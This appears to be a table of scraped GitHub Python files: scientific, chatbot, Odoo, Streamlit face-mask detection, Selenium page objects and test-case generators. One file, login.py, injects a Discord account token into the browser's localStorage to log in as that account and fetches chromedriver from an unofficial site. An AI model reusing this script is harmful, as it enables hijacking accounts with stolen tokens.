blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7d4aaa5e2ea4a2279deba143f873f693f7394bc4 | c5148bc364dac753c0872bd5676027a30b260486 | /biosteam/_facility.py | be6ea781f47ebbbb09b743864d6630a54816bf2b | [
"MIT",
"NCSA",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ecoent/biosteam | 86f47c713a2cae5d6261b6c2c7734ccf7a90fb4e | f1371386d089df3aa8ce041175f210c0318c1fe0 | refs/heads/master | 2021-02-24T14:10:23.158984 | 2020-03-05T03:43:17 | 2020-03-05T03:43:17 | 245,433,768 | 1 | 0 | NOASSERTION | 2020-03-06T13:59:27 | 2020-03-06T13:59:26 | null | UTF-8 | Python | false | false | 270 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 13 02:24:35 2019
@author: yoelr
"""
from ._unit import Unit
__all__ = ('Facility',)
class Facility(Unit, isabstract=True, new_graphics=False):
@property
def system(self):
return self._system
| [
"yoelcortes@gmail.com"
] | yoelcortes@gmail.com |
d51ab0ae91247b60142121da28a88d765a3c73e0 | e8ed7f1bef51d356d18db21869741bd805154d89 | /src/puzzles/InterviewKickstart/graphs/knights-tour.py | 29b055a36b7e23c54030dfb99305d537f5903486 | [] | no_license | brentshermana/CompetativeProgramming | 425e00407b7143693840d393587a7a584baf2197 | bc9ff952beb9491763001ee04e9eb74b6bdb2771 | refs/heads/master | 2021-06-07T00:53:07.874800 | 2020-05-13T03:11:02 | 2020-05-13T03:11:02 | 91,009,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | # given a rows * cols chessboard, and a start and end coordinate,
# calculate the minimum number of moves needed to reach the end coordinate
# using a knight in chess
# return -1 if the path can't be found
from collections import deque, defaultdict
from itertools import product
def find_minimum_number_of_moves(rows, cols, start_row, start_col, end_row, end_col):
# Write your code here.
def in_bounds(r, c):
return 0 <= r < rows and 0 <= c < cols
def adj(r, c):
# could have been more clever here, but
# would impact readability
for dx, dy in product((1, -1), (2, -2)):
r_new, c_new = r+dx, c+dy
if in_bounds(r_new, c_new):
yield r_new, c_new
for dx, dy in product((2, -2), (1, -1)):
r_new, c_new = r+dx, c+dy
if in_bounds(r_new, c_new):
yield r_new, c_new
visited = defaultdict(lambda: defaultdict(bool))
q = deque()
q.appendleft((start_row, start_col, 0))
visited[start_row][start_col] = True
while len(q) > 0:
r, c, moves = q.pop()
if r == end_row and c == end_col:
return moves
for r_new, c_new in adj(r, c):
if not visited[r_new][c_new]:
visited[r_new][c_new] = True
q.appendleft((r_new, c_new, moves+1))
# no path
return -1 | [
"brentshermana@gmail.com"
] | brentshermana@gmail.com |
13009aa46d9516b16f06a105e83f9ac1c56be707 | d9ea7a6f739912047ab5817bdbdd082ef64ad433 | /streamlit_app.py | e80637f81387f5d3d36306430cf6bc1a7d194d43 | [] | no_license | weijiewong27/Hack-Cambridge-MaskerAID | cca6e86455ba65e6692980af9d723064f61cebf0 | 1b943c3023821d1bbf3a4e9b6138d730ed11420a | refs/heads/main | 2023-02-20T15:09:55.045312 | 2021-01-24T12:46:02 | 2021-01-24T12:46:02 | 332,177,118 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,707 | py | # Import all required libaries
import streamlit as st
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
import numpy as np
import cv2
import os
from PIL import Image
import matplotlib.image as mpimg
import urllib
# Operating system dependencies
os.environ['KMP_DUPLICATE_LIB_OK']='True'
st.set_option('deprecation.showfileUploaderEncoding', False)
# Streamlit encourages well-structured code, like starting execution in a main() function.
def main():
# Render the readme as markdown using st.markdown.
readme_text = st.markdown(get_file_content_as_string("instructions.md"))
# Once we have the dependencies, add a selector for the app mode on the sidebar.
st.sidebar.title("What to do")
app_mode = st.sidebar.selectbox("Choose the app mode",
["Show instructions", "Run the video detector", "Run the image detector", "Show the source code"])
if app_mode == "Show instructions":
st.sidebar.success('To continue select "Run the app".')
elif app_mode == "Show the source code":
readme_text.empty()
st.code(get_file_content_as_string("streamlit_app.py")) # change to st_newui.py" when uploaded to Github
elif app_mode == "Run the video detector":
readme_text.empty()
run_video_detector()
elif app_mode == "Run the image detector":
readme_text.empty()
run_image_detector()
# HELPER FUNCTIONS
def load_face_detector_model():
"""
Loads the face detector model (EXTENSION: Train our own face detector model)
"""
prototxt_path = os.path.sep.join(
["face_detector", "deploy.prototxt"])
weight_path = os.path.sep.join(
['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])
net = cv2.dnn.readNet(prototxt_path, weight_path)
return net
# This will make the app stay performant
@st.cache(allow_output_mutation=True)
def load_mask_model():
"""
Loads face mask detector model
"""
mask_model = load_model("mask_detector_ewan.model")
return mask_model
# Load both models
net = load_face_detector_model() # load face detector model
model = load_mask_model() # load mask detector model
# Create confidence level slider
confidence_selected = st.sidebar.slider(
'Select a confidence range', 0.0, 0.1, 0.5, 0.1) # display button to adjust 'confidence' between 0 - 0.5
# Helper functions to load the image and loop over the detection (for video and image options)
def detect_mask_video(image):
label='Starting...'
startX, startY, endX, endY = 0,0,0,0
color = 'g'
# Pre-process image to fit input tensor of face detection model
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
orig = image.copy() # get a copy of the image
(h, w) = image.shape[:2] # get image height and weight
blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
(104.0, 177.0, 123.0))
# Set processed image as the input to the model and run forward pass to compute output
net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
detection = net.forward() # run forward pass to compute output of layer
for i in range(0, detection.shape[2]): # loop through the detection
confidence = detection[0, 0, i, 2] # extract confidence value (something to do with how well the facial region is extracted)
if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
# Generate face bounding box
box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
(startX, startY, endX, endY) = box.astype("int")
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
# Extract face
face = image[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
face = cv2.resize(face, (128, 128)) # resize to input tensor size of mask model (128,128 - Ewan ; 224,224 - Crib)
face = img_to_array(face) # convert resized face to an array
face = preprocess_input(face) # preprocess the array
face = np.expand_dims(face, axis=0) # expand array to 2D
# Run extracted face through mask model and label prediction
(mask, withoutMask) = model.predict(face)[0]
label = "Mask on" if mask > withoutMask else "No Mask"
color = (0, 255, 0) if label == "Mask on" else (255, 0, 0) # bbox is Green if 'mask' else Red
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
# Display label and bbox rectangle in output frame
cv2.putText(image, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 1.20, color, 2)
cv2.rectangle(image, (startX, startY), (endX, endY), color, 2)
else:
continue
return image, label, startX, startY, endX, endY, color # return image and label
def detect_mask_image(image):
# Pre-process image to fit input tensor of face detection model
image = cv2.imdecode(np.fromstring(image.read(), np.uint8), 1) # read the image from tempoary memory
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
orig = image.copy() # get a copy of the image
(h, w) = image.shape[:2] # get image height and weight
blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
(104.0, 177.0, 123.0))
net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
detection = net.forward()
for i in range(0, detection.shape[2]): # loop through the detection
confidence = detection[0, 0, i, 2] # extract confidence value
if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
# Generate face bounding box
box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
(startX, startY, endX, endY) = box.astype("int")
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
# Extract face
face = image[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
face = cv2.resize(face, (128, 128)) # resize to 224, 224
face = img_to_array(face) # convert resized face to an array
face = preprocess_input(face) # preprocess the array
face = np.expand_dims(face, axis=0) # expand array to 2D
# Run extracted face through mask model and label prediction
(mask, withoutMask) = model.predict(face)[0]
label = "Mask" if mask > withoutMask else "No Mask" # define label
color = (0, 255, 0) if label == "Mask" else (255, 0, 0) # bbox is Green if 'mask' else Blue
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
# Display label and bbox rectangle in output frame
cv2.putText(image, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
cv2.rectangle(image, (startX, startY), (endX, endY), color, 2) #display label and bbox rectangle in output frame
return image, label # return image and label
def run_video_detector():
st.title("Face Mask Detector Video App :mask:") # create App title
run = st.checkbox('Run') # checkbox to run video
FRAME_WINDOW = st.image([])
camera = cv2.VideoCapture(0)
while run:
_, frame = camera.read()
image, label, startX, startY, endX, endY, color = detect_mask_video(frame) # call mask detection model
FRAME_WINDOW.image(image) # NOTE: may need to crop this
else:
st.write('Stopped')
def run_image_detector():
st.title("Face Mask Detector Image App :mask:") # create App title
image_file = st.file_uploader("Upload image", type=['jpeg', 'jpg', 'png']) # streamlit function to upload file
if image_file is not None: # Confirm that the image is not a 0 byte file
st.sidebar.image(image_file, width=240) # then display a sidebar of the uploaded image
if st.button("Process"): # Click button to run algorithm on input image
image, label = detect_mask_image(image_file) # call mask detection model
st.image(image, width=420) # display the uploaded image
st.success('### ' + label) # display label
# Download a single file and make its content available as a string.
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
url = 'https://raw.githubusercontent.com/streamlit/demo-self-driving/master/' + path # need to change URL
response = urllib.request.urlopen(url)
return response.read().decode("utf-8")
if __name__ == "__main__":
main() | [
"wjw27@cam.ac.uk"
] | wjw27@cam.ac.uk |
6d031f1f4dcbd9c766182a6e3f257ba19b599a3e | 562d4bf000dbb66cd7109844c972bfc00ea7224c | /addons-clarico/clarico_product/model/__init__.py | ab1cc71c7f627b65c753c486e16b42d63d131315 | [] | no_license | Mohamed33/odoo-efact-11-pos | e9da1d17b38ddfe5b2d0901b3dbadf7a76bd2059 | de38355aea74cdc643a347f7d52e1d287c208ff8 | refs/heads/master | 2023-03-10T15:24:44.052883 | 2021-03-06T13:25:58 | 2021-03-06T13:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | from . import product_template
from . import website
from . import res_config
| [
"root@vmi414107.contaboserver.net"
] | root@vmi414107.contaboserver.net |
1dbac791c31e900db51a5eea154891b5d83a0906 | 35d57f0c682f28ccf8cf8c08efba8dba07e1dc0b | /df_responses.py | 9e99feb3cd35d75d0b7e4a95b72d4ac670c16bfa | [] | no_license | SaiSudhaPanigrahi/halo-nyutia | 88babc51f70ad51468502f8eab863527d218bec3 | a04a8d844cd325218e9657896a88d79648c67f19 | refs/heads/master | 2022-04-17T16:03:35.102612 | 2020-04-15T12:55:18 | 2020-04-15T12:55:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,743 | py | # Responses for Actions On Google
class actions_on_google_response():
# class variable initializer initializer
def __init__(self):
self.platform = "ACTIONS_ON_GOOGLE"
"""
Actions on Google Simple Response Builder
@param name=display_text, type=list
Sample example of display_text ex. [["Text to be displayed", "Text to be spoken", True]]
"""
def simple_response(self, responses):
if len(responses) > 2:
raise Exception(
"Responses argument in simple response should have at most two elements only.")
else:
# a list to store the responses
responses_json = []
# iterate through the list of responses given by the user
for response in responses:
# if SSML = True, build the ssml response, else build textToSpeech
# response[2] = SSML boolean
if response[2]:
# response dictionary
response_dict = {
# text to be diplayed
"displayText": str(response[0]),
# ssml response to be spoken
"ssml": str(response[1])
}
else:
response_dict = {
# text to be displayed
"displayText": str(response[0]),
# text to speech text
"textToSpeech": str(response[1])
}
# add the response dict to the responses list
responses_json.append(response_dict)
# return the simple response JSON
return {
"platform": self.platform,
"simpleResponses": {
"simpleResponses": responses_json
}
}
""""
Actions on Google Basic Card Builder
@param title = string
@param subtitle = string
@param formattedText = string
@param image = list [image_url, accessibility_text]
@param buttons = list of [button_title, url_link]
"""
def basic_card(self, title, subtitle="", formattedText="", image=None, buttons=None):
# list to store buttons responses
buttons_json = []
if buttons is not None:
# iterate through the buttons list
for button in buttons:
# add the buttons response to the buttons list
buttons_json.append(
{
# title of the button
"title": button[0],
# url to be opened by the button
"openUriAction": {
"uri": button[1]
}
}
)
# return basic card JSON
response = {
"platform": self.platform,
"basicCard": {
"title": title,
"subtitle": subtitle,
"formattedText": formattedText,
"buttons": buttons_json,
"image": {
"imageUri": image[0],
"accessibilityText": image[1]
}
}
}
else:
# return basic card JSON
response = {
"platform": self.platform,
"basicCard": {
"title": title,
"subtitle": subtitle,
"formattedText": formattedText,
"image": {
"imageUri": image[0],
"accessibilityText": image[1]
}
}
}
return response
"""
Actions on Google List response
@param list_title = string
@param list_elements = list of list response items
"""
def list_select(self, list_title, list_elements):
# as per the actions on google response list items must be between 2
# and 30
if len(list_elements) > 30 or len(list_elements) < 2:
raise Exception("List items must be two or less than 30.")
else:
# items list to store list elements
items_list = []
# iterate through the list elements list
for list_element in list_elements:
# append the items to the items_list
items_list.append(
{
# title of the list item
"title": list_element[0],
# description of the list item
"description": list_element[1],
# info aabout the list item
"info": {
# key of the list items, key is used as user say
# string
"key": list_element[2][0],
# synonyms are the words that can be used as a
# value for the option when the user types instead
# of selecting from the list
"synonyms": list_element[2][1]
},
# list image
"image": {
# URL
"imageUri": list_element[3][0],
# accessibility text to be spoken
"accessibilityText": list_element[3][1]
}
}
)
# return the list response
return {
"platform": self.platform,
"listSelect": {
"title": list_title,
"items": items_list
}
}
"""
Actions on Google Suggestions chips resoponse
@param suggestions = list of strings
"""
def suggestion_chips(self, suggestions):
# if there are no suggestions in the list raise an error
if len(suggestions) <= 0:
raise Exception(
"Please provide at least one suggestion in suggestion chips response.")
else:
# suggestions_json to store the suggestions JSON
suggestions_json = []
# iterate through the suggestions list
for suggestion in suggestions:
# append the suggestion to the suggestions_json list
suggestions_json.append(
{
# title text to be displayed in the chip
"title": str(suggestion)
}
)
# return the suggestion chips response JSON
return {
"platform": self.platform,
"suggestions": {
"suggestions": suggestions_json
}
}
"""
Actions on Google Linkout suggestions
@param title = string
@param url = string (a valid URL)
"""
def link_out_suggestion(self, title, url):
# title should not be null
if title == "" or url == "":
raise Exception(
"Provide the title and URL for link out suggestion response.")
else:
# return the link out suggestion response
return {
"platform": self.platform,
"linkOutSuggestion": {
"destinationName": str(title),
"uri": str(url)
}
}
# Responses for Facebook
class facebook_response():
# class variable initializer initializer
def __init__(self):
self.platform = "FACEBOOK"
def text_response(self, texts):
# text should contain at least one string
if len(texts) <= 0:
raise Exception("Provide the text for the text response")
else:
# text_obj list for storing the text variations
text_obj = []
for text in texts:
text_obj.append(str(text))
# return the text response
return {
"text": {
"text": text_obj
},
"platform": self.platform
}
def quick_replies(self, title, quick_replies_list):
if title == "":
raise Exception("Title is required for basic card in facebook.")
# quick_replies_list must contains at least one string
elif len(quick_replies_list) <= 0:
raise Exception(
"Quick replies response must contain at least on text string.")
else:
# quick replies list to store the quick replie text
quick_replies = []
for quick_reply in quick_replies_list:
# append to the list
quick_replies.append(
str(quick_reply)
)
# return the response JSON
return {
"quickReplies": {
"title": str(title),
"quickReplies": quick_replies
},
"platform": self.platform
}
def image_response(self, url):
# check url
if url == "":
raise Exception("URL in the image response is required.")
else:
# return the JSON response
return {
"image": {
"imageUri": str(url)
},
"platform": self.platform
}
def card_response(self, title, buttons):
buttons_json = []
for button in buttons:
buttons_json.append(
{
"text": str(button[0]),
"postback": str(button[1])
}
)
# return the card
return {
"card": {
"title": str(title),
"buttons": buttons_json
},
"platform": self.platform
}
# Responses for Telegram
class telegram_response():
# class variable initializer initializer
def __init__(self):
self.platform = "TELEGRAM"
def text_response(self, texts):
# text should contain at least one string
if len(texts) <= 0:
raise Exception("Provide the text for the text response")
else:
# text_obj list for storing the text variations
text_obj = []
for text in texts:
text_obj.append(str(text))
# return the text response
return {
"text": {
"text": text_obj
},
"platform": self.platform
}
def quick_replies(self, title, quick_replies_list):
if title == "":
raise Exception("Title is required for basic card in facebook.")
# quick_replies_list must contains at least one string
elif len(quick_replies_list) <= 0:
raise Exception(
"Quick replies response must contain at least on text string.")
else:
# quick replies list to store the quick replie text
quick_replies = []
for quick_reply in quick_replies_list:
# append to the list
quick_replies.append(
str(quick_reply)
)
# return the response JSON
return {
"quickReplies": {
"title": str(title),
"quickReplies": quick_replies
},
"platform": self.platform
}
def image_response(self, url):
# check url
if url == "":
raise Exception("URL in the image response is required.")
else:
# return the JSON response
return {
"image": {
"imageUri": str(url)
},
"platform": self.platform
}
def card_response(self, title, buttons):
buttons_json = []
for button in buttons:
buttons_json.append(
{
"text": str(button[0]),
"postback": str(button[1])
}
)
return {
"card": {
"title": str(title),
"buttons": buttons_json
},
"platform": self.platform
}
# dialogflow fulfillment response
class fulfillment_response():
def __init__(self):
pass
# fulfillment text builder
# @param fulfillmentText = string
def fulfillment_text(self, fulfillmentText):
if fulfillmentText == "":
raise Exception("Fulfillment text should not be empty.")
else:
return {
"fulfillment_text": str(fulfillmentText)
}
# fulfillment messages builder
# @param response_objects (AOG response, FB response, Telegram response)
def fulfillment_messages(self, response_objects):
if len(response_objects) <= 0:
raise Exception(
"Response objects must contain at least one response object.")
else:
texts = []
for text in response_objects:
texts.append(
{
"text": {
"text": [
text
]
}
}
)
return {
"fulfillmentMessages": texts
}
# dialogflow output contexts
# @param session = dialogflow session id
# @param contexts = context name (string)
def output_contexts(self, session, contexts):
contexts_json = []
for context in contexts:
contexts_json.append({
"name": session + "/contexts/" + context[0],
"lifespanCount": context[1],
"parameters": context[2]
})
# return the output context json
return {
"output_contexts": contexts_json
}
# dialogflow followup event JSON
# @param name = event name
# @param parameters = key value pair of parameters to be passed
def followup_event_input(self, name, parameters):
return {
"followup_event_input": {
"name": str(name),
"parameters": parameters
}
}
# main response with fulfillment text and fulfillment messages
# @param fulfillment_text = fulfillment_text JSON
# @param fulfillment_messages = fulfillment_messages JSON
# @param output_contexts = output_contexts JSON
# @param followup_event_input = followup_event_input JSON
def main_response(self, fulfillment_text, fulfillment_messages=None, output_contexts=None, followup_event_input=None):
if followup_event_input is not None:
if output_contexts is not None:
if fulfillment_messages is not None:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"fulfillmentMessages": fulfillment_messages['fulfillment_messages'],
"outputContexts": output_contexts['output_contexts'],
"followupEventInput": followup_event_input['followup_event_input']
}
else:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"outputContexts": output_contexts['output_contexts'],
"followupEventInput": followup_event_input['followup_event_input']
}
else:
if fulfillment_messages is not None:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"fulfillmentMessages": fulfillment_messages['fulfillment_messages'],
"followupEventInput": followup_event_input['followup_event_input']
}
else:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"followupEventInput": followup_event_input['followup_event_input']
}
else:
if output_contexts is not None:
if fulfillment_messages is not None:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"fulfillmentMessages": fulfillment_messages['fulfillment_messages'],
"outputContexts": output_contexts['output_contexts']
}
else:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"outputContexts": output_contexts['output_contexts']
}
else:
if fulfillment_messages is not None:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text'],
"fulfillmentMessages": fulfillment_messages['fulfillment_messages']
}
else:
response = {
"fulfillmentText": fulfillment_text['fulfillment_text']
}
# return the main dialogflow response
return response
| [
"romanticdevil.jimmy@gmail.com"
] | romanticdevil.jimmy@gmail.com |
ef4ace6d77e93557af3874532ced9981d737fdd6 | a5a4cee972e487512275c34f308251e6cc38c2fa | /examples/Ni__eam__born_exp_fs__postprocessing/CCA_param_clusters_in_qoi_space/configuration/configure_qoi_pca_transform.py | 7c3b9ff7b710945bd9e4fc499cce2f5621fb418b | [
"MIT"
] | permissive | eragasa/pypospack | 4f54983b33dcd2dce5b602bc243ea8ef22fee86b | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | refs/heads/master | 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py | from collections import OrderedDict
from pypospack.pyposmat.data.pipeline import PyposmatPipeline
pipeline_configuration = OrderedDict()
# define first segment (normalization)
pipeline_configuration[0] = OrderedDict() # int keys indicate step number
pipeline_configuration[0]['segment_type'] = 'preprocess'
pipeline_configuration[0]['function_calls'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]= OrderedDict() # int keys allow multiple calls to same function
pipeline_configuration[0]['function_calls'][0]['function'] = 'normalize_standard_scaler'
pipeline_configuration[0]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['cols'] = ['qoi']
pipeline_configuration[0]['function_calls'][0]['args']['clusters'] = None
pipeline_configuration[0]['function_calls'][0]['args']['kwargs'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler']['with_mean'] = True
pipeline_configuration[0]['function_calls'][0]['args']['kwargs']['standard_scaler']['with_std'] = True
# define second segment (CCA transformation)
pipeline_configuration[1] = OrderedDict()
pipeline_configuration[1]['segment_type'] = 'pca'
pipeline_configuration[1]['function_calls'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]= OrderedDict()
pipeline_configuration[1]['function_calls'][0]['function'] = 'transform_cca'
pipeline_configuration[1]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]['args']['cols'] = ['n_qoi']
pipeline_configuration[1]['function_calls'][0]['args']['clusters'] = None
pipeline_configuration[1]['function_calls'][0]['args']['kwargs'] = OrderedDict()
pipeline_configuration[1]['function_calls'][0]['args']['kwargs']['cca'] = OrderedDict()
if __name__ == "__main__":
pipeline = PyposmatPipeline()
fn = __file__.replace('.py', '.in')
pipeline.write_configuration(filename=fn,
d=pipeline_configuration)
| [
"seatonullberg@gmail.com"
] | seatonullberg@gmail.com |
3ab1654cf13c314e4c9f4daf380710aefa6fc152 | 95aaeb4653028914d925e47412f8c1f6735ad30c | /test_cases/testcases.py | 2607ffc38b5211550ced1d6ec0809f1e06c82cf3 | [] | no_license | ikelee/ElevatorShaft | c8b600b41f159b3924ae518a2aa2a70c8af5566c | eb13052f065a8205c8ed15995694ae7370591dcc | refs/heads/master | 2020-12-30T15:53:51.094844 | 2017-05-13T04:02:05 | 2017-05-13T04:02:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | from random import randrange, sample
from collections import OrderedDict
def test_case(floors, elevators, num_events):
max_time = 1000
events = []
for i in range(num_events):
if randrange(num_events) >= i:
# going up
start, end = sorted(sample(range(floors), 2))
else:
start, end = sorted(sample(range(floors), 2))[::-1]
assert(0 <= start < floors)
assert(0 <= end < floors)
time = randrange(i * max_time / num_events, (i + 1) * max_time / num_events)
time = min(time, max_time)
time = max(time, 0)
events.append(OrderedDict([
("time", time),
("start", start),
("end", end),
]))
output = OrderedDict([
("floors", floors),
("elevators", elevators),
("events", events)
])
return output
| [
"noreply@github.com"
] | ikelee.noreply@github.com |
079cfe8dbc2d32586f57d75411663bad4704564d | b7a516279ecb77a95b9e10383a6c743cf956a54a | /login.py | e55325bf0b272375d5b2f709fe7c512f84f35c57 | [] | no_license | venusyt/Token-Login | adde7685922ea0fb03d7b96aae6e83faba4eb898 | 71e4bf3920d246d79b62bef0b0ed30560d85b9dc | refs/heads/main | 2023-08-16T01:17:29.263688 | 2021-09-22T11:21:20 | 2021-09-22T11:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | import os
import discord
from discord.ext import commands
import requests, gratient
from selenium import webdriver
import requests, gratient
import os, os.path, requests
import fade
import colorama
os.system("title 𝙑𝙀𝙉𝙐𝙎 𝙏𝙊𝙆𝙀𝙉 𝙇𝙊𝙂𝙄𝙉")
os.system("cls")
token = ""
while True:
if not token:
os.system("cls")
print(banner)
else:
break
if not os.path.isfile("C:\\Shyta\\chromedriver.exe"):
if not os.path.isfile("C:\\Shyta\\chromedriver.exe"):
if not os.path.isdir("C:\\Shyta"):
os.mkdir("C:\\shyta", 0o666)
print("\n \033[38;2;95;0;230m[>] \033[38;2;190;0;230mDownloading chromedriver...")
r = requests.get("https://shytadriver.netlify.app/driver/chromedriver.exe")
open("C:\\Shyta\\chromedriver.exe", "wb").write(r.content)
print(" \033[38;2;95;0;230m[>] \033[38;2;190;0;230mChromedriver downloaded")
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome("C:\\Shyta\\chromedriver.exe", options=opts)
script = """
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
"""
driver.get("https://discordapp.com/login")
driver.execute_script(script + f'\nlogin("{token}")')
| [
"noreply@github.com"
] | venusyt.noreply@github.com |
20f8c0cba24957a6c66e6a49bdc678e57450332e | 5a30ab3416e218f760d11a2fc99289941ac3b426 | /Page/dealPlanCoursePage.py | 6fdb9638d200e621ca25953bb09ee735325bb9ea | [] | no_license | DaYao/pythonAutoYes | fa24ac2f406c72bbf14a05f88b6f8615d4fad586 | e9d9f2e5b210f83589fadc4b2acdb7d6e4e25f04 | refs/heads/master | 2020-05-25T21:28:17.425492 | 2017-07-18T06:12:37 | 2017-07-18T06:12:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | __author__ = 'xueyan'
#coding:utf-8
import sys,os
BASE_DIR=os.path.dirname(os.path.dirname(__file__))
sys.path.append(BASE_DIR)
# from selenium import webdriver
from selenium.webdriver.common.by import By
from .homePage import HomePage
from .BasePage import WebUI
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
'''消课页面'''
class DealCoursePlanPage(WebUI):
SubmitButton_loc=(By.XPATH, "//button[@class='confirm']")#消课确认
CancelButton_loc=(By.XPATH, "//button[@class='cancel']")#消课取消
valitext_loc=(By.XPATH,"//div[@class='modal-body text-center']/h1")
SubmitButton02_loc=(By.XPATH, "//button[@ng-click='hasNext()']")
CancelButton2_loc=(By.XPATH, "//button[@ng-click='cancelModal']")
def getSubmitButtonField(self):
self.findElement(*self.SubmitButton_loc).click()
self.wait
def getCancelButtonField(self):
self.findElement(*self.CancelButton_loc).click()
self.wait
def getSubmitButton02Field(self):
self.findElement(*self.SubmitButton02_loc).click()
self.wait
def getCancelButton2Field(self):
self.findElement(*self.CancelButton2_loc).click()
self.wait
def getValitextField(self):
self.findElement(*self.valitext_loc).text
self.wait
##消课成功不打印客票
def DealCourse01(self):
self.getSubmitButtonField
Valitext=self.getValitextField()
valiText=self.getConfirmValiTextField()
self.getCancelButton2Field()
return valiText
##消课成功打印客票
def DealCourse01(self):
pass
if __name__=='__main__':
pass
| [
"qwerty1990"
] | qwerty1990 |
777b2f147135a023870de3cce3193786a5c9b525 | 55f60b7ec448eb48b75118b01b3878c8345242bb | /tests/scripts/waf-tools/f_guidelines/__init__.py | de2b6d8f5507598e6072beabb216d9c336060fc1 | [
"BSD-3-Clause",
"CC-BY-4.0"
] | permissive | dd-rrc-ps/foxbms-2 | cd8d272afa24187c85c6fa747226bebed4cefc5e | 555704a9c4af3dd1c2213e6f0be9860f34e2b1b3 | refs/heads/master | 2023-08-18T13:49:42.503755 | 2021-10-21T12:15:09 | 2021-10-21T12:15:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,136 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der angewandten Forschung e.V.
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
